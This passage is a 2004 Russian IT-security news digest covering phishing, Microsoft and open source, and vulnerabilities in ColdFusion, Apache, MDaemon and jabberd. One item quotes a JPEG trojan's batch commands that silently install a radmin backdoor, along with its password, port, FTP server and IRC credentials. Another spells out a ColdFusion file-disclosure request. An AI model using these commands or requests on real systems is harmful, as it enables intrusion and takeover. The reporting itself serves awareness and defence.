на технологии, разработанной Microsoft. Корпорация выразила готовность предоставить ее для использования в этих целях бесплатно, но на условиях лицензирования и сохранения патента, не давая возможностей для внесения изменений. Это вызвало резкую негативную реакцию со стороны большой части представителей интернет-сообщества, которые придерживаются идеологии "открытых источников" (open source) - программные продукты, созданные по этому принципу, широко используются в современном Интернете (например, операционная система и Linux и web-сервер Apache). Инициативной группе IETF не удалось договориться с Microsoft о "раскрытии" лицензии на технологию баз данных, в результате чего, как сообщает Associated Press, группа была распущена без решения о внедрении Sender ID. Вместе с этим, как отмечает агентство, в настоящее время ведутся работы над другими технологиями, одна из которых предложена компанией Yahoo!.
Источник

28/09/2004 13:21 Руководство по "фишингу"
Специалисты британской консалтинговой фирмой Next Generation Security (NGS) в рамках исследования, проведенного фирмой, опубликовали отчёт под названием «Руководство по фишингу. Понимание и предотвращение фишинговых атак» («The Phishing Guide. Understanding & Preventing Phishing Attacks»), который и выложили в Интернете в PDF-формате. В профессиональном «Руководстве» компаниям даются практические советы, как не стать жертвами фишинга. Здесь описываются типичные методы, которые используются злоумышленниками, а также типичные дыры в системах безопасности. Приводятся рекомендации, как улучшить безопасность всей системы на стороне клиента, на серверной стороне, а также на уровне всего предприятия. Документ, составлен независимыми экспертами, и в нем не содержится рекламы конкретных программных продуктов. Советы по безопасности носят академический, системный характер, но при этом предельно конкретны. Специалисты NGS подчеркивают, что большинство «дыр» в безопасности веб-сайтов можно легко устранить сразу же после их обнаружения. «Финансовые организации тратят огромные деньги на безопасность, — говорит Гунтер Оллман (Gunter Ollman), директор по профессинальным сервисам NGS. — Но, когда вы посмотрите на сайт обычного интернет-магазина, то ситуация намного хуже».
Руководство

28/09/2004 13:13 Фишеры атакуют клиентов Citibank и U.S.Bank
По данным антифишинговой ассоциации (APWG) в июле текущего года было зарегистрировано 1974 фишинговых атаки, сообщает CNET News. "Фишинг" ("phishing") - это особый род киберпреступности, использующий не технические недостатки программного обеспечения, а глупость и легковерность пользователей интернета. В сравнении с декабрем прошлого года, когда было замечено 116 случаев фишинга, рост числа мошеннических писем составил 1700%. Две трети июльских атак были направлены против клиентов Citibank и U.S. Bank. В остальных случаях фишеры предлагали посетить подставные сайты компаний eBay и PayPal, Capital One, SunTrust и Wells Fargo. Федеральная корпорация банковских депозитов США (FDIC) также объявила об увеличении количества фишинговых сообщений, рассылаемых якобы от имени компании. Первый случай использования жуликами имени FDIC был зарегистрирован восемь месяцев назад.
"Компьюлента"

28/09/2004 12:10 Microsoft продолжает сближение с движением open-source
Microsoft открыла код FlexWiki, программного обеспечения для создания Wikis — веб-страниц, позволяющих любому числу пользователей высказываться по какой-нибудь общей теме, добавляя и редактируя собственный контент. FlexWiki — это третий из проектов Microsoft, которые компания выпустила в этом году по лицензии Common Public License (CPL). В апреле она опубликовала в сети SourceForge.net код Windows Installer XML (WiX), за которым месяцем позже последовал проект Windows Template Library (WTL). Microsoft отмечает, что оба эти проекта попали в первые 5% наиболее активных проектов SourceForge: за прошедшее время было загружено 100 тыс. копий WiX и 20 тыс. копий WTL. Код FlexWiki тоже будет сделан доступным на сайте SourceForge. Реакция на появление Microsoft на сайте open-source была относительно нейтральной, отмечает директор SourceForge Патрик Макговерн. «Нельзя сказать, что она была абсолютно позитивной, но меня не сожгли», — говорит он. Что касается FlexWiki, то Microsoft использовала эту программу внутри компании для создания компонентов собственного сайта для разработчиков Channel 9. В Microsoft работает основатель Wiki Уорд Каннингем — он сотрудник отделения Prescriptive Architecture Guidance, которое помогает компаниям проектировать системы на базе ПО Microsoft. На прошлой неделе Microsoft распространила свой проект Government Security Program на код Office. Участвующие в нем государственные ведомства могут изучать, но не модифицировать исходный код наиболее важных для Microsoft продуктов, таких как Windows.
ZDNet

28/09/2004 11:40 Появился троян, использующий уязвимость в JPEG!
Ну вот! То, о чём так долго говорили антивирусные компании после выхода бюллетеня от M$ 04-028 свершилось! Зафиксировано распространение первого трояна, который использует уязвимость библиотеки GDI+ для обработки JPEG-файлов. О начале распространения объявил в списке рассылки BUGTRAQ предствитель компании EasyNews, обеспечивающей доступ к Usenet. Исходный код был разослан по многим Usenet-конференциям 27 Sep 2004 01:25:52 GMT. Как пишет сам автор, им был написан скрипт, который сканировал jpeg-файлы, поступающие в конференции через сервер EasyNews. В 6:47pm PDT 9/26/2004 на его пейджер поступил первый сигнал. Далее был проведён детальный анализ трояна. После заражения он соединяется с неким FTP-сервером (209.171.43.27) и скачивает около 2 мегабайт различных файлов, в результате чего троян исталлирует себя, как сервер, а также исталлирует в систему ПО удалённого администрирования radmin, заупскаемое, кк сервис 'r_server'. В момент проверки вышеприведённого FTP-сервера были зафиксировано 93 подключившихся машины. После скачивания всех файлов с сервера запускается файл 'execute.bat', запускающий:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server,
где nvsvc как раз и есть троян (живёт в директории c:\windows\system32\system\). Также исталлируется IRC-клиент, который к серверу irc.p2pchat.net на канал #FurQ с логино-паролем Darkbro0d:letmein. Что примечательно - это то, что троян был кинут в конференции, связанные с эротикой, транссексуализмом и прочими непотребствами. Надо думать, что посетители этих конференций тянут картинки, не задумываясь. Приведён полный текст трояна.
Подробное описание

28/09/2004 11:04 Выставка SoftTool-2004
С 28 сентября по 2 октября 2004 года в павильоне № 69 Всероссийского выставочного центра состоится выставка SoftTool-2004 (юбилейная - 15-я). "СОФТУЛ" - это главная в России выставка разработчиков программного обеспечения и информационных технологий. "СОФТУЛ" отражает состояние российского рынка компьютерных технологий. Под влиянием выставки в значительной степени происходит формирование и развитие этого рынка в стране. Выставка "СОФТУЛ" является самым крупным и представительным в России форумом новейших разработок в области информационных технологий и их применения в экономике страны. Трудно переоценить значение этой выставки для развития российской компьютерной индустрии. По оценкам Министерства промышленности, науки и технологий России "Софтул" - самая большая в Европе национальная выставка информационных технологий. С 2001 года "СОФТУЛ" включает две самостоятельные экспозиции "САПР'экспо" и "АСУТП'экспо".
Подробности

28/09/2004 10:51 В Интернете растет объем аудиоспама
Аудиоспам или спит все больше распространяется в интернете. Распространение спита связано с ростом популярности интернет-телефонии. IP-телефония очень привлекательна для спамеров, так как использует интернет-протоколы, позволяющие рассылать одно письмо тысячам получателей с огромной скоростью. Так, технологии IP-телефонии позволяют рассылать до 1 тыс. аудиописем в минуту. Антиспамовые компании уделяют все большее внимание разработке технологий, препятствующих спиту, сообщил Хinhuanet.
CNews

28/09/2004 10:38 Операционная система для смартфонов от Palm
На днях PalmSource сообщила, что в скором времени в свет выйдет новая операционная система предназначенная исключительно для смартфонов. Также нам стало известно, что новинка будет поддерживать работу со встроенным интерфейсом Bluetooth, а также получит новый интернет браузер и поддержку сервисов RIM BlackBerry. Помимо этого PalmSource сообщила, что в ближайшем будущем операционная система будет установлена на 11 смартфонах.
Mobile-Review

28/09/2004 10:17 Уязвимости в Macromedia ColdFusion МХ
Macromedia выпустила бюллетень, в котором описываются 2 уязвимости в ПО этой компании Macromedia ColdFusion МХ. Обнаружены в версиях 6.0, 6.1, 6.1 J2EE - JRun. Первая уязвимость может использоваться для просмотра каких-либо файлов на удаленном компьютере с расширениями .php, .asp, .pl. Для этого им достаточно отправить на машину-жертву сформированный особым образом запрос, подставив в конец запроса URL ";.cfm". Уязвимость проявляется только при работе с Вэб-сервером IIS. Кроме того, переполнение буфера при включенном режиме отладки Verbose часто приводит к падению сервера JRun ("verbose=true", хотя обычно этот режим отключён). Злоумышленники могут использовать этот недостаток для организации DoS-атак. Файлы, в которых включается этот параметр различаются на разных Вэб-серверах: в IIS - jrun.ini; Netscape, IPlanet, SunOne - obj.conf; Apache - httpd.conf (секция "JRun Settings"). Администраторам сервером рекомендуют воспользоваться кумулятивными патчами.
Описание

28/09/2004 10:12 Недельный отчёт Panda Software
В очередной раз опубликован еженедельный отчёт о вирусной активности от Panda Software. В отчёте рассмотрены четыре червя: Evaman.D, Mydoom.AB, Mydoom.Z и Mydoom.X.
Отчёт

28/09/2004 09:29 Россия получит Windows для бедных
К концу года Microsoft выпустит для России Windows XP Starter Edition, относительно недорогую и усеченную версию Windows, надеясь отвадить потребителей в этой стране от пиратского программного обеспечения и Linux. Кроме того, на этой неделе софтверный гигант назовет еще одну азиатскую страну, где он будет продавать дешевую версию Windows, так что общее число охваченных программой стран увеличивается до пяти. Windows XP Starter Edition представляет собой попытку Microsoft привлечь больше заказчиков в развивающихся странах — на самых быстрорастущих в мире рынках. У этой ОС несколько отличий от обычной Windows. Например, пользователи могут работать только с тремя программами одновременно, а поддержка домашних сетей в ней исключена. К тому же эта версия только предустанавливается на авторизованные ПК. Microsoft не продает ее в магазинах отдельно. С другой стороны, она стоит значительно дешевле обычной Windows. По словам источников, Starter Edition продается за $36, вместо $70 или более, которые производители платят за Windows ХР. К ОС прилагается диск с руководством и локализованный контент в помощь начинающим пользователям. Низкая цена облегчает Microsoft конкуренцию с настольной Linux. А так как заказчики Starter Edition могут получать исправления и обновления, Microsoft надеется, что ПК, оснащенные этой ОС, будут привлекательнее тех, на которые установлены пиратские версии Windows. Россия — наряду с Бразилией, Индией и Китаем — становится едва ли не главной надеждой хайтек-компаний. Один из руководителей Intel сказал, что в ближайшие годы Россия и Китай, вероятно, станут двумя самыми быстрорастущими рынками производителя процессоров. Одна из ведущих российских компьютерных компаний — Kraftway. В прошлом месяце Microsoft объявила о своем намерении выпустить в октябре версии Windows Starter Edition для Малайзии, Индонезии и Таиланда. Пятую страну Microsoft объявит на этой неделе, но это, по словам представителя компании, не Китай. Вероятным кандидатом считают Вьетнам, где очень популярны интернет-кафе, а такие продукты, как Mr. Yee's Windows 98, можно купить на улице за $1.
ZDNet

28/09/2004 09:14 Microsoft готова выпустить на европейский рынок урезанную версию Windows
Корпорация Microsoft готова выпустить на европейский рынок операционную систему Windows, в которую не будет включен проигрыватель Windows Media Player. Это произойдет, если Антимонопольная комиссия ЕС не отменит штраф в размере 497 миллионов евро (613 миллионов долларов) наложенный на корпорацию. "Мы готовы подчинится решению ЕС", - передает Assosiated Press слова адвоката Microsoft Брэда Смита. По его словам, корпорация Билла Гейтса потратила за последние месяцы миллионы долларов, чтобы привести операционную систему в тот вид, который удовлетворяет Евросоюз. Ранее руководители Microsoft не раз заявляли, что изъятие из Windows медиа-плеера невозможно, поскольку эта программа является неотъемлемой частью "операционки".
Lenta.Ru

27/09/2004 17:23 Очередной эксплоит уязвимости в JPEG
опубликован PoC код, позволяющий системному администратору проверить защищенность своих систем против недавно обнаруженной уязвимости переполнения буфера при обработке jpeg изображений в различных продуктах Microsoft Windows. Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на уязвимой системе (получить удалённый шаелл на компьютере под управлением Windows XP).
Исходный код эксплоита

27/09/2004 17:17 Cеминар по PGP в МГУ
Как сообщает linux.org.ru, в пятницу, 1 октября, в 18:00 в аудитории 758 факультета ВМиК МГУ (Москва, Воробьёвы горы, МГУ, 2-й учебный корпус, 7-й этаж) пройдёт семинар на тему "Использование PGP/GnuPG"", совмещенный с подписью PGP/GnuPG ключей. Приглашаются все, кому интересна тема и кому есть чем поделиться с теми, кому интересно. Так же приглашаются параноики в области privacy и желающие расширить свой keyring.
Информация о семинаре

27/09/2004 16:14 Уязвимость в веб-сервере Apache
В популярном веб-сервере Apache обнаружена уязвимость, которая теоретически может использоваться злоумышленниками с целью получения неавторизованного доступа к определенным ресурсам компьютера-жертвы. Как сообщается, проблема связана с некорректной обработкой директивы "Satisfy" и присутствует в веб-сервере Apache версии 2.0.51. Нападение может быть осуществлено удаленно, в связи с чем уязвимость была охарактеризована как средне опасная. Патч уже выпущен и доступен для загрузки.
Описание

27/09/2004 15:22 Смартфон с антивирусом
В октябре Nokia выпустит новый смартфон на базе платформы Symbian OS, Nokia 6670. Для него корпорация через фирму F-Secure будет предлагать программу защиты от вирусов с функцией автоматического обновления баз по сети мобильной связи. За получение обновлений необходимо будет вносить небольшую ежемесячную абонентскую плату. Саму программу поставлять с телефонами не планируется - ее можно будет получить на сайте F-Secure. Представители последней ведут переговоры и с другими производителями телефонов о возможности поставки для них аналогичной системы защиты. Nokia и ранее предлагала антивирус - для устройств линейки Communicator, но как сообщают в компании, новая защитная разработка гораздо совершеннее в плане функциональности и будет обходиться пользователям дешевле. Обновления можно будет получать по протоколу HTTPS или средствами SMS.
"Открытые системы"

27/09/2004 15:09 Топ-менеджер Red Hat поставил задачу перед Sun
Один из высших руководителей Red Hat требует гарантий для движения open-source от своего недавнего бизнес-партнера Sun Microsystems. В своем веб-логе вице-президент Red Hat по делам open-source Майкл Тиманн критикует Sun за поддержку патентов на программное обеспечение и за решение оставить код Java проприетарным. «Если вам не нужна open-source Java, вы не хотите занять правильную позицию в отношении патентов на ПО и продолжаете делать только то, что выгодно Microsoft, почему мы должны верить вашим словам?» — спрашивает Тиманн президента Sun Джонатана Шварца. Тиманн отвечает на постинг в блоге Шварца, обращенный к сообществу open-source, в котором тот предлагает: «Пожалуйста, не слушайте ненормальных тупиц, проповедующих заговор против Sun. Они были лунатиками раньше, они лунатики теперь и они всегда будут лунатиками. Мы любим сообщество open-source — мы сами происходим от него. Мы всем сердцем и со всей своей энергией защищаем это сообщество, его новаторство и свое место в нем». Хотя Sun продает версию Linux от Red Hat на своих серверах с процессорами Xeon и Opteron, она держит конкурента под прицелом. Не далее как на этой неделе Шварц сказал: «Мы, безусловно, нацелены конкретно против Red Hat». Sun подняла постинг Тиманна на смех. «Приятно было узнать, что Тиманн регулярно нас читает, но свои веб-постинги он использует исключительно в качестве маркетингового инструмента, чтобы произвести впечатление, — говорит представитель Sun Ноэль Харцелл. — Sun с радостью ответит на все конкретные вопросы, но мы не делаем это через СМИ. Тот, кто хочет, чтобы с ним говорили прямо, пусть высказывает свои претензии, как это делают цивилизованные деловые люди».
Веб-лог Тимана
Веб-лог Шварца

27/09/2004 14:45 Хотите стать сотрудником ФСБ?
Довольно любопытный вид сервиса появился в Интернете. За довольно небольшие деньги можно получить удостоверение сотрудника ФСБ. На сайте www.fsbinfo.com утверждается, что удостоверение выписывается от имени ООО "Федеральная Служба Безопасности РФ", якобы зарегистрированного в Санкт-Петербурге. В структуре ООО "Федеральная Служба Безопасности РФ", сообщается на сайте, существуют: управление контрразведывательных операций, управление информационной безопасности, управление экономической безопасности, управление собственной безопасности и управление оперативной информации. Их сотрудники получают общественные звания от прапорщика до подполковника и общественные должности от оперативного сотрудника до начальника управления. Утверждается, что в удостоверении "Федеральная Служба Безопасности РФ" по желанию заказчика указывается любое управление любого города и любая должность. Удостоверение "Федеральная Служба Безопасности РФ" якобы является точной копией служебного удостоверения сотрудника ФСБ России, однако на нем в левой и правой части есть микро шрифт со словом "сувенир". Шрифт этой надписи очень мелкий и невооруженным взглядом не виден, утверждается на сайте. Стать обладателем удостоверения можно, как заполнив бланк заявки на сайте, так и заказав программу на CD для самостоятельного изготовления. Программа предусматривает изготовление фотографии заказчика для удостоверения в форме. Шаблоны формы прилагаются.
Полюбуйтесь

27/09/2004 14:01 На основе Napster cоздана самая безопасная в мире почта
Компания JefTel объявила о создании принципиально нового сервиса безопасной электронной почты, сообщает The Guardian. Он построен на технологии Peer-2-Peer со сложной технологией шифрования. Подобную технологию использовала служба обмена файлами Napster, закрытая за нарушении авторских прав. Обмен почтовыми сообщениями в JefTel будет производиться напрямую между отправителем и получателем. Таким образом исключается возможность перехвата содержимого писем "третьими лицами", системными администраторами или провайдерами. За пользование сервисом JefTel планирует взымать абонентсткую плату размером 25 фунтов в год, а сама программа доступна для загрузки с сайта разработчика и проста в использовании - установить ее на персональный компьютер может практически любой пользователь. По словам руководителя группы разработчиков, к 2007 году планируется привлечь более 10 миллионов пользователей.
Lenta.Ru

27/09/2004 13:27 Автоматическая сетевая установка Windows
OpenNet в очередной раз порадовал нас замечательной статьей. На сей раз речь идет об автоматизации такой рутинной работы как установка Windows (на примере XP) на пользовательские комьютеры. Хотя в качестве сервера автор использует FreeBSD, администраторам, использующим Linux статья будет не менее полезна.
Автор статьи - Александр Дейтер.
www.opennet.ru

26/09/2004 14:13 Хакеры определяют основные объекты кибератак
Самыми престижными и интересными объектами для хакеров являются компьютерные сети силовых ведомств (прежде всего Пентагона) и НАСА. И в каждом новом поколении компьютерных мальчиков находится свой охотник до реальных приключений. По некоторым оценкам, в США на протяжении суток фиксируется не менее одной-двух попыток проникновения в информационные сети только одного министерства обороны США. Поэтому научно-технический комитет Пентагона (Defense Science Board) создал рабочую группу по проблемам защиты от информационных атак. В 1990 году группа австралийских хакеров проникла в информационную сеть НАСА, что привело к остановке работы всей системы на 24 часа. Датские хакеры проникли в военные системы США во время телепередачи на США датской телевизионной станции. Они вошли в компьютерные сети Центра космических исследований имени Кеннеди, командования Тихоокеанским флотом США и Ливерморской национальной лаборатории имени Лоуренса. В январе 2001 года группа хакеров, именующая себя Pentaguard, провела «массовое обезличивание» WEB-сайтов ряда государственных и военных структур США, Великобритании и Австралии. Первые страницы взломанных сайтов были заменены текстами, прославляющими спиртные напитки, или просто краткими сообщениями типа «The largest gov&mil mass defacement in the history of minkind». Отслеживающая хакерскую активность служба Attrition.org называла данную серию взломов самой масштабной в истории. В октябре 2001 года венгерские хакеры порезвились на интернет-сайте департамента национальной безопасности Венгрии. После взлома преступники оставили на главной странице сайта несколько антиамериканских и антиглобалистских лозунгов под общим заголовком «Бен Ладен против Буша, 1:0». Согласно данным, распространенным в апреле 2000 г. в Вене на X конгрессе по профилактике преступности, общий доход террористов от компьютерных преступлений составляет 500 млн. долл. в год. Ущерб от деятельности компьютерных террористов достигает 3,5 млрд. долл. в год и увеличивается ежегодно на 35%. Средние убытки от одного акта компьютерного терроризма составляют сумму около 560 тыс. долларов.
Crime-research.Ru

26/09/2004 13:03 В продуктах Macromedia нет уязвимости при обработке JPEG-изображений
Компания Macromedia выпустила бюллетень, в котором констатируется, что в продуктах этой компании нет уязвимости при обработке JPEG-изображений. После появления знаменитого MS04-028 специалисты по безопасности исследовали все продукты компании и не обнаружили там уязвимостей. Это связано с тем, что при обработке графических изображений используются собственные бибилиотеки, однако, как подчёркивается, некоторые продукты при инсталляции ставить библиотеку gdiplus.dll. Тем не менее ПО Macromedia не использует подпрограммы, которые приводят к уязвимости. Среди подобных продуктов названы: Contribute, Dreamweaver, Fireworks, Flash, FlashPaper, FreeHand, RoboSource Control,* Studio MX.
Подробности

26/09/2004 12:54 Удаленное переполнение буфера в MDaemon 6.5.1
Обнаружена уязвимость в MTA (и IMAP-сервере) MDaemon 6.5.1. Переполнение буфера возможно в функции "sprintf" при разборе комманд SAML. Функция находится по адресу 0x1000417c в MdUser.dll. Так же переполняются команды SOML,SEND,MAIL. Вторая уязвимость обнаружена в IMAP-сервере при обработке команды LIST. Опуюдикованы уязвимости, позволяющие провести удалённую атаку на этот продукт.
Подробности

26/09/2004 12:31 Счёт открыт: первая заплата для XP SP2
Microsoft выпустила первое обновление для сервисного комплекта Windows XP Service Pack 2. Вскоре после его выхода у установивших SP2 пользователей виртуальных частных сетей обнаружились трудности с подключением приложений к шлейфовым IP-адресам, отличным от стандартного 127.0.0.1. В SP2 такие адреса блокируются, и пользователь получает сообщение об ошибке. В конце августа появилась временная заплата, устраняющая данную проблему, а на днях - постоянная, выполненная в виде обновления для SP2. В настоящее время в Microsoft принимают меры, направленные на то, чтобы ускорить дистрибуцию второго сервисного комплекта для Windows XP. По данным на март этого года, корпорация продала около 210 млн. лицензий на XP (не считая копии, проданные комплектами предприятиям).
Описание и патч

26/09/2004 12:05 Microsoft: новую версию IE можно получить только в составе XP SP2
Корпорация Microsoft объявила о том, что новая версия браузера Internet Explorer будет доступна только в пакете Windows XP Service Pack 2. Апгрейд до ХР с более старых версий Windows будет стоить $99. Не пользователям Windows придется заплатить $199 за XP с новым браузером. Аналитики считают, что цена на новую версию IE завышена, так как многие потребители будут вынуждены платить за обновление всей ОС. 200 млн. пользователей используют Windows более старых версий, чем XP. С одной стороны, такая политика Microsoft способствует продвижению XP, а с другой вынудит многих перейти на альтернативные браузеры, например Firefox.
CNews

26/09/2004 11:38 Panda Software включает антиспам-фильтры в свои продукты
Panda Software объявила о заключении соглашения с компанией Mailshell, ведущим производителем средств защиты от спама, по условиям которого, Panda будет интегрировать механизм защиты от спама Mailshell в свои корпоративные и персональные защитные программные продукты. Миллионы Интернет пользователей, выбравших защиту от вирусов, вторжений, спама и других вредоносных кодов от компании Panda, теперь присоединятся к пользователям, которые по всему миру выбрали продукты Mailshell для защиты от спама. По условиям соглашения, Panda интегрирует в свои продукты модуль защиты от спама Mailshell, который выполняет более 300 000 проверок для того, чтобы определить, является сообщение спамом или нет. Механизм способен выполнять тысячи расчетов за доли секунды. Объединяя в себе быстрое, компактное, гибкое и полное дерево решений с автоматическим механизмом самонастройки, Mailshell способен показывать точные результаты в распознавании спама.
Источник

26/09/2004 11:06 Google готовит к выпуску собственный браузер
Google готовит к выпуску собственный браузер. К такому выводу пришли журналисты из CNET News.com, которые проанализировали слухи и новостные сообщения о деятельности крупнейшего поискового сайта. О том, что Google активно разрабатывает новую программу по работе с интернетом, косвенно свидетельствует то, что компания зарегистрировала доменное имя gbrowser.com, подала запрос в патентное бюро, а также пригласила на работу соответствующих специалистов. Заявка в патентное бюро была подана на регистрацию технологии публикации веб-рекламы на браузере пользователя и других приложениях, работающих с интернетом. Что касается трудоустройства новых сотрудников, то, по данным CNET News, среди них есть всемирно известные программисты Джошуа Блоч (бывший ведущий программист Sun Microsystems), Адам Босворт (один из разработчиков Internet Explorer) и Джо Беда (разработчик графического интерфейса Avalon для следующей версии операционной системы Windows). Кроме того, по некоторым данным, Google активно сотрудничает с создателями веб-браузера Mozilla. Как полагают эксперты, интерфейс браузера, возможно, будет включать в себя приложения для работы с уже внедренными компанией интернет-сервисами - бесплатной почтой Gmail, системой онлайн-дневников Blogger, а также некоторые программы, разработанные компанией в последнее время, например - блокиратор всплывающих рекламных окон (pop-up blocker). В нем, разумеется, должен также появиться Desktop Bar - специальная программа для браузеров, которая помогает вести поиск на Google, не заходя на сайт.
Подробности

24/09/2004 19:26 Gartner: "Windows – величайший бета-тест в истории"
Покупать ПО без изъянов гораздо логичнее, чем тратить деньги и время на его доработку. Компании должны требовать от разработчиков качественные продукты, утверждают исследователи рынка. На днях прошла конференция по вопросам информационной безопасности, проводившаяся консалтинговой компанией Gartner. Основной темой конференции было постулирование необходимости ИТ-специалистам сконцентрировать внимание на оптимизации расходов в этой сфере. «ИТ-менеджерам надо проявлять больше инициативы во внедрении систем, которые будут корректно функционировать с самого начала, а не тратить время и деньги на исправление недостатков задним числом, — цитирует АР слова Виктора Уитмана (Victor Wheatman), вице-президента и руководителя исследовательского направления Gartner. — У ПО не должно быть изъянов, а ИТ-специалисты должны заставить вендоров делать его таким. Иначе расходы на обеспечение информационной безопасности будут продолжать расти». Наглядным примером «от противного» г-н Уитман назвал ОС Windows: «Это величайший бета-тест в истории и он продолжается до сих пор. Версия Longhorn должна решить некоторые проблемы внутри Windows, но она не является окончательным решением и дефекты системы всё равно останутся. Наши исследования показывают, что устранение дефектов ПО после того, как оно начало продаваться, обходится дороже в 3–5 раз. Почему бы не исправлять их во время разработки и тестирования? Расчеты говорят, что если бы 50% погрешностей программ устранялись до продажи потребителям, издержки по устранению изъянов ПО снизились бы на 75%, не говоря о издержках от последствий этих ошибок». По оценкам Gartner, к 2006 году компании будут тратить на безопасность от 4% до 5% ИТ-бюджета. С учетом расходов на аутсорсинг эта цифра может возрасти до 6–9%. При этом аналитики отмечают, что прямая зависимость между увеличением расходов на безопасность и повышением эффективности инфраструктуры отсутствует, защищенность корпорации можно обеспечить «малой кровью». Примечание от ньюсмейкера - на мой взгляд, господа из Garther погорячились - как бы здесь альфа-версией не попахивало, а альфа-тестеры мы с вами, уважаемые пользователи Windows.
CNews

24/09/2004 19:03 Cтатья "Правовые методы борьбы со спамом".
Обычно спаммеры пытаются прикрывают свою зловредную деятельность Конституцией. Любопытно, что привлечь спаммеров к ответственности можно также при помощи Конституции. Основным аргументом спаммеров был аргумент законности их действий. В предлагаемой статье юриста Ольги Лазаревой предлагаются методы борьбы со спамом.
Статья

24/09/2004 18:17 Уязвимость в jabberd
Jose Antonio Calvo сообщил об обнаруженной уязвимости в jabberd и jadc2s, которая может быть использована злоумышленниками для проведения DoS (Denial of Service) атаки. (jabberd - сервер популярного интернет-пейджера Jabber, который имеет открытые протокол и бесплатное, свободно распространяемое серверное и клиентское ПО с открытыми исходниками, распространяемое по GPL-лицензии, что позволило ему завоевать популярность). Уязвимость возникает из-за ошибки при разборе XML. (Jabber-протокол основан на XML), что приводит к краху программы при обработке специально созданной строки. Уязвимость присутствует в jabberd 1.4.3 и jadc2s 0.90. Ошибка исправлена, исправления находятся в CVS репозирории.
Источник

24/09/2004 15:38 Виртуальными вирусами займутся реальные вирусологи
Национальный научный фонд (NSF) Соединенных Штатов выделяет 13 миллионов долларов на адаптацию методов предсказания эпидемий в человеческих сообществах к прогнозированию вирусных вспышек в глобальных компьютерных сетях. Смысл проекта состоит в создании «иммунной системы» для интернета. То есть, разработке технологий, способных гасить эпидемии компьютерных вирусов в самом зародыше. По словам директора программы от Национального научного фонда Карла Лэндвера (Carl Landwehr), ученым предстоит разработать новые средства быстрой идентификации и уничтожения компьютерных вирусов и сетевых червей. По информации агентства Reuters, в освоении гранта примут участие ученые из Калифорнийского университета (Сан-Диего), Международного института компьютерных исследований (Беркли), а также Университета Карнеги Меллона.
Internet.Ru

24/09/2004 14:53 В ПО MeshAP-Pro интегрировали поддержку криптоустройства VIA PadLock ACE
Пресс-служба компании VIA Technologies объявила, что приложение MeshAP-Pro от LocustWorld начнет поддерживать аппаратный комплекс VIA PadLock ACE, позволяющий шифровать и дешифровать данные, передаваемые по сети. Приложение MeshAP-Pro от LocustWorld используется операторами беспроводных сетей для доступа в интернет сотового типа, где каждый узел сети автоматически соединяется с соседним для формирования крупномасштабной самоорганизующейся сети. Данные по сети шифруются с использованием цифровых сертификатов и динамически генерируемых ключей. При увеличении трафика нагрузка на шлюзы возрастает из-за большого количества одновременных зашифрованных соединений. Благодаря использованию VIA PadLock ACE увеличивается производительность узловых шлюзов в загруженных сетях. Взаимодействие между узлами, поддерживающими VIA PadLock ACE и другими узлами, выполняющими шифрование, обеспечивается поддержкой стандарта AES.
CNEWS

24/09/2004 12:30 Троян Sokeven использует дыру в Internet Explorer
Специалисты компании Symantec обнаружили новую вредоносную программу. Троян, получивший название Sokeven, инфицирует компьютеры под управлением операционных систем Microsoft Windows через одну из дыр в браузере Internet Explorer при посещении пользователем сайта в домене www.earthlabs.biz. После проникновения на машину-жертву Sokeven записывает свою копию под именем w32.exe в системную директорию и добавляет ссылку на данный файл в ключ автозапуска реестра. Далее вредоносная программа открывает "черный вход" в систему, через который злоумышленники могут получить доступ к зараженному компьютеру.
Описание

24/09/2004 11:21 Mandrake получила контракт на повышение уровня безопасности Linux
Консорциум во главе с парижской компанией Mandrakesoft, которая недавно прекратила процедуру защиты от банкротства, получила трехлетний контракт на укрепление защиты Linux на сумму 7 млн евро ($8,6 млн). Mandrakesoft совместно с компаниями Bertin Technologies, Surlog, Jaluna и Oppida будет доводить Linux до уровня безопасности Evaluation Assurance Level 5 (EAL5) по международной системе сертификации Common Criteria. Такая сертификация особенно важна для военных и заказчиков из госсектора; проект финансируется Министерством обороны Франции. Уровень сертификации EAL5 значительно выше, чем тот, что имеют существующие версии Linux. Red Hat в апреле достигла уровня EAL2, в августе — EAL3+, а Novell SuSE Linux получила уровень EAL3+ в январе. Теперь эти компании, которые доминируют на коммерческом рынке операционной системы с открытым исходным кодом, совместно с IBM и Oracle работают над дальнейшим повышением уровня сертификации. По завершении проекта Mandrakesoft обещает выпустить плоды своего труда в виде ПО open-source. Операционные системы Microsoft Windows, Sun Microsystems Solaris, Hewlett-Packard HP-UX и IBM AIX сертифицированы по уровню EAL4. Сертификация по уровню EAL5 встречается реже; его получила, например, IBM для своей технологии, которая позволяет мейнфреймам z900 и z990 подразделяться на независимые, изолированные сегменты.
ZDNet

24/09/2004 10:17 IBM: проблема "битых" ссылок решена. Их не будет
Группа студентов, работающих в компании IBM по схеме интернатуры, разработали инструмент, позволяющий автоматически находить и исправлять так называемые "битые" интернет-ссылки, сообщает BBC News. Сейчас администраторам сайтов приходится устранять подобные проблемы вручную. Система, названная Peridot, автоматически проверяет необходимые вебстраницы на предмет наличия ссылок, регистрирует их, и затем отслеживает происходящии со страницами изменения. Причем не имеет значения, где находится страница - в Интернете или локальной сети. После проверки сайта Peridot генерирует отчет и автоматически отсылает его электронной почтой администратору, который может либо принять изменения, либо проигнорировать их. Peridot может не только предупреждать администраторов сайта о появлении "битых" ссылок, но сообщать, куда были перемещены оригинальные страницы и какие изменения произошли с содержимым сайта. По словам разработчиков, компании, которые будут использовать систему Peridot, смогут не беспокоиться о потере репутации, поскольку посетители больше не увидят сообщений о том, что определенные страницы или документы были перемещены или удалены. На интранет-сайтах крупных компаний, в которых работает много людей, своевременное отслеживание "битых" ссылок сможет помочь росту производительности труда сотрудников, которым не придется тратить много времени на поиски необходимого контента.
Lenta.Ru

23/09/2004 19:32 Эксплоит уязвимости в JPEG
Ранее мы публиковали ссылку на эксплоит узвимости, обнаруженной в обработчике формата JPEG. Опубликован ещё один эксплоит, представляющий собой шелл-скрипт (для оболчки Борна), при запуске которого и задании имени графического файла формируется заголовок, который вызывает эксплоит. Как пишет сам автор, при попытке просмотра этого файла Windows падает, также падает ОС при подведении курсора мыши над графическим изображением.
Эксплоит

23/09/2004 19:09 Выход SpamAssassin 3.0
